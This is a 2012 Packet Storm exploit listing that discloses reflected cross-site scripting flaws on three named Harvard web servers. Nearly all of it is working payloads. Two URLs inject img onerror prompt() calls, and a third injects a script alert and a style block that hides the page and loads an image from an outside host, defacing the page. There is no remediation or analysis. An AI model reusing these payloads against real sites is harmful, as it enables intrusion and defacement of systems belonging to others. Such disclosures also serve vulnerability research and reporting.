Harvard Cross Site Scripting

2012-09-16T00:00:00
ID PACKETSTORM:116601
Type packetstorm
Reporter TayfunBasoglu
Modified 2012-09-16T00:00:00

Description

                                        
                                            `# Exploit Title: Havard XSS  
# Date: 16.09.2012  
# Author: TayfunBasoglu  
# Tested: BackTrack 5  
# Platform: php,cgi  
------------------------------------------------------------------  
http://scully.cfa.harvard.edu/cgi-bin/feedback.cgi?U="><img src=x onerror=prompt("TayfunBasoglu");>  
  
http://discovery.lib.harvard.edu/?q=%22%3E%3C/title%3E%3Cscript%3Ealert%28%22TayfunBasoglu%22%29%3C/script%3E%3Cstyle%3Ebody{visibility:hidden;}%20html%20{%20background-image:%20url%28http://lenagold.ru/fon/ani/cat/bel/belkot38.jpg%29;%20}%3C/style%3E  
  
http://mazur.harvard.edu/research/detailspage.php?rowid="><img src=x onerror=prompt("TayfunBasoglu");>  
------------------------------------------------------------------  
  
tayfunbasoglu.blogspot.com  
twitter.com/tayfunbasoglu   
  
`